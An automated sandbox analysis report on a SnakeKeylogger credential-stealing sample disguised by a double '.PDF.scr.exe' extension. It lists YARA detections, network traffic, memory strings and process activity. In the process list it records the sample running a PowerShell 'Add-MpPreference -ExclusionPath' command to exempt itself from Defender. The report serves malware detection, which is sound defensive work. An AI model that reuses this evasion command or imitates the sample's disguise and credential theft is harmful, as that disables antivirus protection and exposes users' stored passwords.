                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: pre-stowage.PDF.scr.exe
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_02E23E280_2_02E23E28
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_02E2E1040_2_02E2E104
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_02E26F900_2_02E26F90
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_079565C00_2_079565C0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795DDF00_2_0795DDF0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_07957CAA0_2_07957CAA
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795F4180_2_0795F418
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795E3E80_2_0795E3E8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_07958B280_2_07958B28
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_079572710_2_07957271
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795E7D00_2_0795E7D0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795E7E00_2_0795E7E0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_079577080_2_07957708
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795AE180_2_0795AE18
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795AE080_2_0795AE08
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795DDE30_2_0795DDE3
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_079565210_2_07956521
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795654D0_2_0795654D
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795AC100_2_0795AC10
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795AC010_2_0795AC01
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795F4080_2_0795F408
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795EB900_2_0795EB90
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795E3D80_2_0795E3D8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_07958ACA0_2_07958ACA
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_07959A080_2_07959A08
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795B2790_2_0795B279
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_07955A600_2_07955A60
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_079599F90_2_079599F9
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795B0990_2_0795B099
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795E0980_2_0795E098
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795B0A80_2_0795B0A8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795E0A80_2_0795E0A8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A00400_2_094A0040
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A79B00_2_094A79B0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A9BB00_2_094A9BB0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A71400_2_094A7140
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A91B00_2_094A91B0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A00060_2_094A0006
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A75780_2_094A7578
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A05E00_2_094A05E0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_094A05F00_2_094A05F0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFC1474_2_00EFC147
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFD2784_2_00EFD278
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF53624_2_00EF5362
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFC4684_2_00EFC468
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFC7384_2_00EFC738
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF69A04_2_00EF69A0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFE9884_2_00EFE988
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFCA084_2_00EFCA08
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFCCD84_2_00EFCCD8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF9DE04_2_00EF9DE0
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF6FC84_2_00EF6FC8
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFCFA94_2_00EFCFA9
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EFE97A4_2_00EFE97A
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF3E094_2_00EF3E09
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1331309353.00000000094B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1328346964.0000000007863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1328346964.0000000007863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1327810612.00000000077F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000000.1285805465.0000000000C20000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDjCW.exe: vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1312395806.00000000011CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1319452030.0000000003297000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3762586006.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exeBinary or memory string: OriginalFilenameDjCW.exe: vs pre-stowage.PDF.scr.exe
                Source: pre-stowage.PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: pre-stowage.PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UfFTqgYtsb6KTX3coT.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, UfFTqgYtsb6KTX3coT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UfFTqgYtsb6KTX3coT.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UfFTqgYtsb6KTX3coT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UfFTqgYtsb6KTX3coT.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UfFTqgYtsb6KTX3coT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2644:120:WilError_03
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stlwkqko.czw.ps1Jump to behavior
                Source: pre-stowage.PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: pre-stowage.PDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: pre-stowage.PDF.scr.exeReversingLabs: Detection: 28%
                Source: pre-stowage.PDF.scr.exeVirustotal: Detection: 30%
                Source: unknownProcess created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: edputil.dllJump to behavior
